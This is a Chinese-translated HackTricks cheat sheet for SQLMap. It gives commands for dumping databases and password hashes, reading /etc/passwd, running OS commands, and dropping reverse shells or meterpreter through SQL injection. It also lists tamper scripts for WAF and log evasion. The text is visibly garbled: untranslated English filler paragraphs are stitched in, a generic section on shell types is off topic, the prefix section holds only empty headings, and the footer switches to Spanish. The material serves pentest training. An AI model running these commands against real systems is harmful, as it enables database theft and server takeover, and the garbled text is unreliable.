hacktricks/pentesting-web/sql-injection/sqlmap/README.md

# SQLMap - 速查表

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks 云平台 ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* 你在一家**网络安全公司**工作吗？你想在 HackTricks 中看到你的**公司广告**吗？或者你想获得**PEASS 的最新版本或下载 HackTricks 的 PDF 版本**吗？请查看[**订阅计划**](https://github.com/sponsors/carlospolop)！
* 发现我们的独家 [**NFTs**](https://opensea.io/collection/the-peass-family) 集合 - [**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* **加入** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass)，或者**关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* **通过向** [**hacktricks 仓库**](https://github.com/carlospolop/hacktricks) **和** [**hacktricks-cloud 仓库**](https://github.com/carlospolop/hacktricks-cloud) **提交 PR 来分享你的黑客技巧。**

</details>

<figure><img src="../../../.gitbook/assets/image (1) (1) (2) (4).png" alt=""><figcaption></figcaption></figure>

[**DragonJAR Security Conference 是一场国际网络安全活动**](https://www.dragonjarcon.org/)，已经举办了十多年，将于2023年9月7日至8日在哥伦比亚波哥大举行。这是一个技术内容丰富的活动，展示了最新的西班牙语研究，吸引了来自世界各地的黑客和研究人员。\
立即在下面的链接注册，不要错过这个重要的会议！:

{% embed url="https://www.dragonjarcon.org/" %}

## SQLmap 的基本参数

### 通用参数
```bash
-u "<URL>"
-p "<PARAM TO TEST>"
--user-agent=SQLMAP
--random-agent
--threads=10
--risk=3 #MAX
--level=5 #MAX
--dbms="<KNOWN DB TECH>"
--os="<OS>"
--technique="UB" #Use only techniques UNION and BLIND in that order (default "BEUSTQ")
--batch #Non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
--auth-type="<AUTH>" #HTTP authentication type (Basic, Digest, NTLM or PKI)
--auth-cred="<AUTH>" #HTTP authentication credentials (name:password)
--proxy=http://127.0.0.1:8080
--union-char "GsFRts2" #Help sqlmap identify union SQLi techniques with a weird union char
```
### 检索信息

#### 内部
```bash
--current-user #Get current user
--is-dba #Check if current user is Admin
--hostname #Get hostname
--users #Get usernames od DB
--passwords #Get passwords of users in DB
--privileges #Get privileges
```
#### 数据库数据

The database contains sensitive information that can be valuable to an attacker. This information can include usernames, passwords, personal details, financial data, and more. It is important for a penetration tester to identify and extract this data during a security assessment.

数据库包含对攻击者有价值的敏感信息。这些信息可能包括用户名、密码、个人详细信息、财务数据等。在安全评估过程中，渗透测试人员需要识别并提取这些数据。

SQL injection vulnerabilities can be exploited to access and manipulate the database directly. This allows an attacker to retrieve, modify, or delete data from the database. SQLMap is a powerful tool that automates the process of detecting and exploiting SQL injection vulnerabilities.

可以利用SQL注入漏洞直接访问和操作数据库。这使得攻击者能够从数据库中检索、修改或删除数据。SQLMap是一款强大的工具，可以自动化检测和利用SQL注入漏洞的过程。

By using SQLMap, a penetration tester can easily identify the presence of SQL injection vulnerabilities and extract data from the database. SQLMap supports various database management systems, including MySQL, Oracle, PostgreSQL, and Microsoft SQL Server.

通过使用SQLMap，渗透测试人员可以轻松地识别SQL注入漏洞的存在，并从数据库中提取数据。SQLMap支持多种数据库管理系统，包括MySQL、Oracle、PostgreSQL和Microsoft SQL Server。

To use SQLMap, the tester needs to provide the target URL and specify the parameters vulnerable to SQL injection. SQLMap will then automatically detect and exploit the vulnerabilities, allowing the tester to extract data from the database.

要使用SQLMap，测试人员需要提供目标URL并指定易受SQL注入攻击的参数。然后，SQLMap将自动检测和利用漏洞，使测试人员能够从数据库中提取数据。

It is important to note that SQLMap should only be used on systems that the tester has permission to test. Unauthorized use of SQLMap or any other hacking tool is illegal and unethical.

需要注意的是，SQLMap只能在测试人员获得测试权限的系统上使用。未经授权使用SQLMap或任何其他黑客工具是非法和不道德的。
```bash
--all #Retrieve everything
--dump #Dump DBMS database table entries
--dbs #Names of the available databases
--tables #Tables of a database ( -D <DB NAME> )
--columns #Columns of a table  ( -D <DB NAME> -T <TABLE NAME> )
-D <DB NAME> -T <TABLE NAME> -C <COLUMN NAME> #Dump column
```
## 注入位置

### 从Burp/ZAP捕获

捕获请求并创建一个req.txt文件
```bash
sqlmap -r req.txt --current-user
```
### GET请求注入

In some cases, web applications use GET requests to retrieve data from a database. This can make them vulnerable to SQL injection attacks. SQLMap is a powerful tool that can automate the process of detecting and exploiting SQL injection vulnerabilities in GET requests.

在某些情况下，Web应用程序使用GET请求从数据库中检索数据。这可能使它们容易受到SQL注入攻击的影响。SQLMap是一个强大的工具，可以自动化检测和利用GET请求中的SQL注入漏洞。

To perform a GET request injection using SQLMap, you need to provide the target URL and specify the vulnerable parameter. SQLMap will then analyze the target and attempt to exploit any SQL injection vulnerabilities it finds.

要使用SQLMap执行GET请求注入，您需要提供目标URL并指定易受攻击的参数。然后，SQLMap将分析目标并尝试利用它发现的任何SQL注入漏洞。

Here is an example command to perform a GET request injection using SQLMap:

以下是使用SQLMap执行GET请求注入的示例命令：

```
sqlmap -u "http://example.com/page.php?id=1" --dbms=mysql --level=5 --risk=3 --tamper=space2comment
```

In this command, `-u` specifies the target URL, `--dbms` specifies the database management system, `--level` specifies the level of tests to perform, `--risk` specifies the risk level, and `--tamper` specifies the tampering script to use.

在此命令中，`-u`指定目标URL，`--dbms`指定数据库管理系统，`--level`指定要执行的测试级别，`--risk`指定风险级别，`--tamper`指定要使用的篡改脚本。

SQLMap will automatically analyze the target URL, detect any SQL injection vulnerabilities, and attempt to exploit them. It will provide detailed information about the vulnerabilities it finds, such as the type of vulnerability, the payload used, and the results of the exploitation.

SQLMap将自动分析目标URL，检测任何SQL注入漏洞，并尝试利用它们。它将提供有关发现的漏洞的详细信息，例如漏洞类型、使用的有效载荷和利用结果。

It is important to note that performing SQL injection attacks without proper authorization is illegal and unethical. Always ensure that you have proper authorization and permission before conducting any penetration testing activities.

需要注意的是，在没有适当授权的情况下进行SQL注入攻击是非法和不道德的。在进行任何渗透测试活动之前，始终确保您具有适当的授权和许可。
```bash
sqlmap -u "http://example.com/?id=1" -p id
sqlmap -u "http://example.com/?id=*" -p id
```
### POST请求注入

In some cases, the target application may use the POST method to send data to the server. This can be a common scenario for login forms or data submission forms. In such cases, the attacker can exploit SQL injection vulnerabilities by injecting malicious SQL statements into the POST parameters.

在某些情况下，目标应用程序可能使用POST方法将数据发送到服务器。这在登录表单或数据提交表单中是常见的情况。在这种情况下，攻击者可以通过向POST参数中注入恶意的SQL语句来利用SQL注入漏洞。

To perform a POST request injection, you can use the `--data` option in SQLMap to specify the POST data. The `--data` option takes a string parameter in the format `param1=value1&param2=value2`, where `param1` and `param2` are the names of the POST parameters and `value1` and `value2` are the corresponding values.

要执行POST请求注入，您可以使用SQLMap中的`--data`选项来指定POST数据。`--data`选项接受一个字符串参数，格式为`param1=value1&param2=value2`，其中`param1`和`param2`是POST参数的名称，`value1`和`value2`是相应的值。

For example, if the target application has a login form with two parameters `username` and `password`, you can use the following command to perform a POST request injection:

例如，如果目标应用程序具有一个带有两个参数`username`和`password`的登录表单，您可以使用以下命令执行POST请求注入：

```
sqlmap -u "http://example.com/login" --method POST --data "username=admin&password=test"
```

In this example, SQLMap will send a POST request to `http://example.com/login` with the `username` parameter set to `admin` and the `password` parameter set to `test`. SQLMap will then analyze the response to identify any SQL injection vulnerabilities.

在此示例中，SQLMap将使用`username`参数设置为`admin`和`password`参数设置为`test`向`http://example.com/login`发送POST请求。然后，SQLMap将分析响应以识别任何SQL注入漏洞。

Remember to properly encode the values of the POST parameters to ensure that the request is correctly interpreted by the server. You can use URL encoding or other appropriate encoding methods for this purpose.

请记住正确编码POST参数的值，以确保服务器正确解释请求。您可以使用URL编码或其他适当的编码方法来实现这一目的。
```bash
sqlmap -u "http://example.com" --data "username=*&password=*"
```
### 头部和其他HTTP方法中的注入

In addition to injecting payloads in the URL parameters, SQL injection can also occur in other parts of the HTTP request, such as headers and other HTTP methods. These injection points can be exploited to manipulate the behavior of the web application and potentially extract sensitive information from the database.

#### Header Injection

Header injection occurs when user-controlled input is not properly sanitized and is included in the HTTP headers. Attackers can inject malicious content into headers, which can lead to various security vulnerabilities, including cross-site scripting (XSS) and remote code execution (RCE).

To test for header injection vulnerabilities, you can use SQLMap's `--headers` option. This option allows you to specify custom headers to be sent with the HTTP request. By injecting payloads into the headers, you can check if the application is vulnerable to header injection attacks.

#### Other HTTP Methods

SQL injection can also occur in other HTTP methods, such as POST, PUT, and DELETE. These methods are commonly used for data manipulation and can be vulnerable to injection attacks if user input is not properly sanitized.

To test for SQL injection vulnerabilities in other HTTP methods, you can use SQLMap's `--method` option. This option allows you to specify the HTTP method to be used during the attack. By injecting payloads into the request body or parameters of these methods, you can check if the application is vulnerable to SQL injection.

It is important to thoroughly test all possible injection points in the HTTP request to ensure the security of the web application.
```bash
#Inside cookie
sqlmap  -u "http://example.com" --cookie "mycookies=*"

#Inside some header
sqlmap -u "http://example.com" --headers="x-forwarded-for:127.0.0.1*"
sqlmap -u "http://example.com" --headers="referer:*"

#PUT Method
sqlmap --method=PUT -u "http://example.com" --headers="referer:*"

#The injection is located at the '*'
```
### 当注入成功时指示字符串

When performing SQL injection attacks, it is important to determine whether the injection was successful or not. One way to do this is by indicating a specific string that will be displayed if the injection is successful.

To achieve this, you can use the `--string` option in SQLMap. This option allows you to specify a string that should be present in the response when the injection is successful.

Here is an example command that demonstrates the usage of the `--string` option:

```
sqlmap -u "http://example.com/vulnerable.php?id=1" --string "Injection successful"
```

In this example, SQLMap will send requests to the specified URL with different payloads to test for SQL injection vulnerabilities. If the response contains the string "Injection successful", SQLMap will consider the injection to be successful.

By indicating a specific string, you can easily identify whether the injection was successful or not, allowing you to proceed with further exploitation or move on to other targets.
```bash
--string="string_showed_when_TRUE"
```
### Eval

**Sqlmap**允许使用`-e`或`--eval`在发送每个有效载荷之前使用一些Python一行代码进行处理。这使得在发送有效载荷之前以自定义方式非常容易和快速地处理有效载荷。在下面的示例中，**flask cookie session**在发送之前由flask使用已知的密钥进行签名：
```bash
sqlmap http://1.1.1.1/sqli --eval "from flask_unsign import session as s; session = s.sign({'uid': session}, secret='SecretExfilratedFromTheMachine')" --cookie="session=*" --dump
```
### Shell

#### Introduction

The shell is a command-line interface that allows users to interact with the operating system. It provides a way to execute commands, navigate the file system, and manage processes. In the context of penetration testing, the shell is a powerful tool that can be used to gain unauthorized access to a target system.

#### Types of Shells

There are different types of shells available, each with its own features and capabilities. Some common types of shells include:

- **Bourne Shell (sh):** The Bourne shell is the original Unix shell and is still widely used today. It provides basic functionality and is compatible with most Unix-like systems.

- **Bash (Bourne Again SHell):** Bash is a popular shell that is compatible with the Bourne shell. It includes additional features such as command history, tab completion, and job control.

- **C Shell (csh):** The C shell is another Unix shell that provides a C-like syntax and additional features such as command-line editing and history.

- **Korn Shell (ksh):** The Korn shell is an enhanced version of the Bourne shell with additional features such as command-line editing, history, and job control.

- **Zsh (Z Shell):** Zsh is a powerful shell that includes features from other shells such as Bash and Korn shell. It provides advanced customization options and is highly extensible.

#### Using the Shell for Penetration Testing

In penetration testing, the shell is often used to execute commands on a target system and perform various tasks such as reconnaissance, privilege escalation, and data exfiltration. Here are some common use cases for using the shell in penetration testing:

- **Command Execution:** The shell can be used to execute commands on a target system, allowing the tester to gather information, manipulate files, and perform other actions.

- **File System Navigation:** The shell provides commands for navigating the file system, allowing the tester to explore directories, list files, and access sensitive data.

- **Process Management:** The shell allows the tester to manage processes on the target system, including starting, stopping, and monitoring processes.

- **Privilege Escalation:** The shell can be used to escalate privileges on a target system, gaining higher levels of access and control.

- **Data Exfiltration:** The shell can be used to exfiltrate data from a target system, allowing the tester to retrieve sensitive information.

#### Conclusion

The shell is a powerful tool in penetration testing, providing the ability to execute commands, navigate the file system, and manage processes. Understanding the different types of shells and their capabilities is essential for effective penetration testing. By leveraging the power of the shell, testers can identify vulnerabilities, exploit them, and assess the security of target systems.
```bash
#Exec command
python sqlmap.py -u "http://example.com/?id=1" -p id --os-cmd whoami

#Simple Shell
python sqlmap.py -u "http://example.com/?id=1" -p id --os-shell

#Dropping a reverse-shell / meterpreter
python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn
```
### 读取文件

The `--file-read` option in SQLMap allows you to read files from the database server's file system. This can be useful for retrieving sensitive information stored in files.

To use this option, you need to provide the path to the file you want to read. SQLMap will then attempt to read the contents of the file and display them in the output.

Here is an example command:

```
sqlmap -u "http://example.com/vulnerable.php?id=1" --file-read="/etc/passwd"
```

In this example, SQLMap will send a request to the vulnerable URL `http://example.com/vulnerable.php?id=1` and attempt to read the contents of the `/etc/passwd` file.

Keep in mind that this technique may not work in all cases, as it depends on the permissions and configuration of the database server. Additionally, it is important to use this technique responsibly and only on systems that you have proper authorization to test.
```bash
--file-read=/etc/passwd
```
### 使用SQLmap爬取网站并自动利用漏洞

SQLmap是一款功能强大的自动化SQL注入工具，可以用于爬取网站并自动利用SQL注入漏洞。以下是使用SQLmap进行网站爬取和自动利用的步骤：

1. **爬取网站**
   - 使用`-u`参数指定目标网站的URL，例如：`sqlmap -u http://www.example.com`
   - SQLmap将自动扫描目标网站，寻找可能存在的SQL注入漏洞
   - 一旦发现漏洞，SQLmap将提供进一步的操作选项

2. **自动利用漏洞**
   - 使用`--dbs`参数获取目标网站上的数据库信息，例如：`sqlmap -u http://www.example.com --dbs`
   - 使用`-D`参数指定要攻击的数据库，例如：`sqlmap -u http://www.example.com -D dbname`
   - 使用`--tables`参数获取目标数据库中的表信息，例如：`sqlmap -u http://www.example.com -D dbname --tables`
   - 使用`-T`参数指定要攻击的表，例如：`sqlmap -u http://www.example.com -D dbname -T tablename`
   - 使用`--dump`参数获取目标表中的数据，例如：`sqlmap -u http://www.example.com -D dbname -T tablename --dump`

通过按照上述步骤，您可以使用SQLmap自动爬取网站并利用SQL注入漏洞获取目标数据库中的敏感数据。请注意，在进行任何形式的渗透测试之前，确保您已经获得了合法的授权，并遵守适用的法律法规。
```bash
sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3

--batch = non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
--crawl = how deep you want to crawl a site
--forms = Parse and test forms
```
### 二次注入

Second Order Injection is a type of SQL injection attack that occurs when user input is not directly used in a SQL query, but is stored in a database and later used in a query. This can happen when user input is stored in a database and then retrieved and used in a query without proper sanitization or validation.

二次注入是一种SQL注入攻击类型，当用户输入不直接用于SQL查询，而是存储在数据库中并在稍后的查询中使用时发生。这可能发生在用户输入被存储在数据库中，然后在查询中检索和使用时没有进行适当的过滤或验证。

For example, let's say a web application allows users to submit comments, which are then stored in a database. Later, when displaying these comments, the application retrieves them from the database and includes them in a SQL query without proper sanitization. An attacker can then manipulate their comment to include malicious SQL code, which will be executed when the query is run.

例如，假设一个Web应用程序允许用户提交评论，这些评论随后存储在数据库中。稍后，在显示这些评论时，应用程序从数据库中检索它们并将它们包含在一个SQL查询中，而没有进行适当的过滤。攻击者可以操纵他们的评论，包含恶意的SQL代码，当查询运行时将被执行。

To exploit a second order injection vulnerability, an attacker typically needs to have their input stored in the database and then trigger the execution of the query that uses the stored input. This can be done by either manipulating the application to perform the query or by waiting for a legitimate user to trigger the query.

要利用二次注入漏洞，攻击者通常需要将他们的输入存储在数据库中，然后触发使用存储输入的查询的执行。这可以通过操纵应用程序执行查询或等待合法用户触发查询来完成。

To prevent second order injection attacks, it is important to properly sanitize and validate all user input before using it in a query. This includes both input that is used directly in a query and input that is stored in a database for later use. Additionally, using prepared statements or parameterized queries can help protect against second order injection by separating the query logic from the user input.

为了防止二次注入攻击，在使用用户输入之前，正确地对所有用户输入进行过滤和验证非常重要。这包括直接在查询中使用的输入和存储在数据库中以供以后使用的输入。此外，使用预处理语句或参数化查询可以通过将查询逻辑与用户输入分离来帮助防止二次注入攻击。
```bash
python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3
sqlmap -r 1.txt -dbms MySQL -second-order "http://<IP/domain>/joomla/administrator/index.php" -D "joomla" -dbs
```
[**阅读此文章**](second-order-injection-sqlmap.md)**，了解如何使用sqlmap执行简单和复杂的二次注入。**

## 实践实验室

* 通过在**THM房间**中使用sqlmap来学习它：

{% embed url="https://tryhackme.com/room/sqlmap" %}

## 自定义注入

### 设置后缀
```bash
python sqlmap.py -u "http://example.com/?id=1"  -p id --suffix="-- "
```
### 前缀

---

### Description

描述

---

### Usage

用法

---

### Options

选项

---

### Examples

示例

---

### References

参考资料
```bash
python sqlmap.py -u "http://example.com/?id=1"  -p id --prefix="') "
```
### 帮助寻找布尔注入

Boolean-based SQL injection is a technique used to exploit vulnerabilities in web applications that do not properly sanitize user input before constructing SQL queries. By injecting carefully crafted boolean expressions into the input fields, an attacker can manipulate the behavior of the application and extract sensitive information from the database.

To identify boolean-based SQL injection vulnerabilities, you can use tools like SQLMap. SQLMap is a powerful open-source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws.

Here are the steps to find boolean injection using SQLMap:

1. **Identify the target**: Determine the URL of the vulnerable web application that you want to test for boolean-based SQL injection.

2. **Launch SQLMap**: Open a terminal and run SQLMap with the appropriate command-line options. For example:
   ```
   sqlmap -u <target_url> --level=5 --risk=3 --technique=B
   ```

   - The `-u` option specifies the target URL.
   - The `--level` option sets the level of tests to be performed (5 is the highest).
   - The `--risk` option sets the risk level of tests to be performed (3 is the highest).
   - The `--technique` option specifies the injection technique to be used (B for boolean-based).

3. **Analyze the results**: SQLMap will automatically analyze the target URL for boolean-based SQL injection vulnerabilities. It will send various payloads and analyze the responses to determine if the application is vulnerable.

4. **Exploit the vulnerability**: If SQLMap identifies a boolean-based SQL injection vulnerability, it can automatically exploit it to extract data from the database. You can specify additional options to customize the exploitation process.

By following these steps, you can effectively identify and exploit boolean-based SQL injection vulnerabilities in web applications. However, it is important to note that you should only perform these activities on systems that you have proper authorization to test.
```bash
# The --not-string "string" will help finding a string that does not appear in True responses (for finding boolean blind injection)
sqlmap -r r.txt -p id --not-string ridiculous --batch
```
### 篡改

记住**你可以自己在Python中创建篡改器**，而且非常简单。你可以在[二次注入页面](second-order-injection-sqlmap.md)中找到一个篡改器示例。
```bash
--tamper=name_of_the_tamper
#In kali you can see all the tampers in /usr/share/sqlmap/tamper
```
| Tamper                       | 描述                                                                                                                               |
| ---------------------------- | ---------------------------------------------------------------------------------------------------------------------------------- |
| apostrophemask.py            | 将撇号字符替换为其UTF-8全角对应字符                                                                                                 |
| apostrophenullencode.py      | 将撇号字符替换为其非法的双Unicode对应字符                                                                                           |
| appendnullbyte.py            | 在负载末尾附加编码的NULL字节字符                                                                                                   |
| base64encode.py              | 对给定负载中的所有字符进行Base64编码                                                                                               |
| between.py                   | 将大于运算符（'>'）替换为'NOT BETWEEN 0 AND #'                                                                                     |
| bluecoat.py                  | 在SQL语句后面的空格字符后替换为有效的随机空白字符。然后将字符'='替换为LIKE运算符                                                      |
| chardoubleencode.py          | 对给定负载中的所有字符进行双URL编码（不处理已编码的字符）                                                                             |
| commalesslimit.py            | 将类似'LIMIT M, N'的实例替换为'LIMIT N OFFSET M'                                                                                    |
| commalessmid.py              | 将类似'MID(A, B, C)'的实例替换为'MID(A FROM B FOR C)'                                                                                |
| concat2concatws.py           | 将类似'CONCAT(A, B)'的实例替换为'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)'                                                                 |
| charencode.py                | 对给定负载中的所有字符进行URL编码（不处理已编码的字符）                                                                               |
| charunicodeencode.py         | 对给定负载中的未编码字符进行Unicode URL编码（不处理已编码的字符）。"%u0022"                                                          |
| charunicodeescape.py         | 对给定负载中的未编码字符进行Unicode URL编码（不处理已编码的字符）。"\u0022"                                                          |
| equaltolike.py               | 将所有等于运算符（'='）的出现替换为LIKE运算符                                                                                       |
| escapequotes.py              | 斜杠转义引号（'和"）                                                                                                               |
| greatest.py                  | 将大于运算符（'>'）替换为'GREATEST'对应字符                                                                                        |
| halfversionedmorekeywords.py | 在每个关键字之前添加有版本的MySQL注释                                                                                               |
| ifnull2ifisnull.py           | 将类似'IFNULL(A, B)'的实例替换为'IF(ISNULL(A), B, A)'                                                                                |
| modsecurityversioned.py      | 使用有版本的注释包围完整查询                                                                                                         |
| modsecurityzeroversioned.py  | 使用零版本的注释包围完整查询                                                                                                         |
| multiplespaces.py            | 在SQL关键字周围添加多个空格                                                                                                         |
| nonrecursivereplacement.py   | 将预定义的SQL关键字替换为适合替换的表示形式（例如.replace("SELECT", ""))过滤器                                                       |
| percentage.py                | 在每个字符前面添加百分号（'%'）                                                                                                     |
| overlongutf8.py              | 转换给定负载中的所有字符（不处理已编码的字符）                                                                                       |
| randomcase.py                | 将每个关键字字符替换为随机大小写值                                                                                                 |
| randomcomments.py            | 向SQL关键字添加随机注释                                                                                                             |
| securesphere.py              | 追加特殊制作的字符串                                                                                                               |
| sp\_password.py              | 在负载末尾追加'sp\_password'以自动混淆DBMS日志                                                                                      |
| space2comment.py             | 将空格字符（' '）替换为注释                                                                                                         |
| space2dash.py                | 将空格字符（' '）替换为破折号注释（'--'），后跟随机字符串和换行符（'\n'）                                                               |
| space2hash.py                | 将空格字符（' '）替换为井号字符（'#'），后跟随机字符串和换行符（'\n'）                                                                 |
| space2morehash.py            | 将空格字符（' '）替换为井号字符（'#'），后跟随机字符串和换行符（'\n'）                                                                 |
| space2mssqlblank.py          | 将空格字符（' '）替换为来自有效备选字符集的随机空白字符                                                                               |
| space2mssqlhash.py           | 将空格字符（' '）替换为井号字符（'#'），后跟换行符（'\n'）                                                                             |
| space2mysqlblank.py          | 将空格字符（' '）替换为来自有效备选字符集的随机空白字符                                                                               |
| space2mysqldash.py           | 将空格字符（' '）替换为破折号注释（'--'），后跟换行符（'\n'）                                                                           |
| space2plus.py                | 将空格字符（' '）替换为加号（'+'）                                                                                                   |
| space2randomblank.py         | 将空格字符（' '）替换为来自有效备选字符集的随机空白字符                                                                               |
| symboliclogical.py           | 将AND和OR逻辑运算符替换为其符号对应字符（&&和\|\|）                                                                                  |
| unionalltounion.py           | 将UNION ALL SELECT替换为UNION SELECT                                                                                                |
| unmagicquotes.py             | 将引号字符（'）替换为多字节组合%bf%27，后跟通用注释（使其起作用）                                                                     |
| uppercase.py                 | 将每个关键字字符替换为大写值'INSERT'                                                                                                |
| varnish.py                   | 追加HTTP头'X-originating-IP'                                                                                                       |
| versionedkeywords.py         | 使用有版本的MySQL注释括起每个非函数关键字                                                                                            |
| versionedmorekeywords.py     | 使用有版本的MySQL注释括起每个关键字                                                                                                |
| xforwardedfor.py             | 追加伪造的HTTP头'X-Forwarded-For'                                                                                                  |

<figure><img src="../../../.gitbook/assets/image (1) (1) (2) (4).png" alt=""><figcaption></figcaption></figure>

[**DragonJAR Security Conference es un evento internacional de ciberseguridad**](https://www.dragonjarcon.org/) con más de una década que se celebrará el 7 y 8 de septiembre de 2023 en Bogotá, Colombia. Es un evento de gran contenido técnico donde se presentan las últimas investigaciones en español que atrae a hackers e investigadores de todo el mundo.\
¡Regístrate ahora en el siguiente enlace y no te pierdas esta gran conferencia!:

{% embed url="https://www.dragonjarcon.org/" %}

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres ver tu **empresa anunciada en HackTricks**? ¿O quieres tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? ¡Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
* Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Obtén el [**merchandising oficial de PEASS y HackTricks**](https://peass.creator-spring.com)
* **加入** [💬](https://emojipedia.org/speech-balloon/) [Discord 群组](https://discord.gg/hRep4RUj7f) 或 [Telegram 群组](https://t.me/peass) 或 **关注**我的 **Twitter** [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/hacktricks\_live)**。**
* **通过向** [hacktricks 仓库](https://github.com/carlospolop/hacktricks) **和** [hacktricks-cloud 仓库](https://github.com/carlospolop/hacktricks-cloud) **提交 PR 来分享你的黑客技巧。**